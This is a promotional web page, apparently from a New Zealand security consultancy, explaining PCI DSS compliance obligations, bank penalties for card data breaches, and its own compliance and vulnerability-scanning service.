Whether you are an online retailer who has taken credit card payments for years, or a business who has started to take credit card payments as a way for clients to pay their bills, there are a few important things you should consider.

Any business taking credit card payments will have signed a merchant agreement with their bank. One of the terms of that merchant agreement is that the business needs to comply with the Payment Card Industry Data Security Standards (PCIDSS). These cover the security measures required to keep credit card information secure.

Here are links to the PCI DSS pages of the major banks

BNZ

ANZ

Westpac

KiwiBank

Many businesses will not realise that they have this contractual obligation. Even if you use a 3rd party payment gateway, you still need to confirm that the rest of your website is secure. Criminals can compromise your website so that credit card details are stolen whilst clients believe they are being entered into the secure payment gateway.

If criminals do manage to steal the credit card details of your clients, the penalties from your bank can include:

  • Fines of up to USD 500,000
  • A mandatory review of your security (at your cost)
  • Removal of your ability to take credit card payments

And your reputation with your clients will obviously suffer. This can have a far greater impact. You may have implemented security measures in other parts of your business, but the loss of credit card data will make clients question whether you can be trusted with the rest of their information.

To avoid this outcome, businesses need to do the following:

  • Make sure your website is secure
  • Make sure that any other methods of taking credit card payments are secure (for example over the phone or in person)
  • Make sure that credit card information is stored securely (it’s best not to store it at all)
  • Complete an annual Self Assessment Questionnaire (see below) stating that you have taken steps to secure your website
  • Run vulnerability scans of the website each quarter to prove that it is is still secure

Our PCI DSS Compliance Service is a cost-effective way for you to meet your obligations and reduce the risk to your clients and your business.

We work with you and your web developer to complete the Self Assessment Questionnaire.  If there are areas where you are non-compliant we will provide recommendations to bring you up to the required standard.  And we scan your website every month to look for vulnerabilities that could be used by criminals. If the scans show issues we advise you and your web developers and provide recommendations on how to resolve them.

If you’d like to discuss this service in more detail, please get in touch.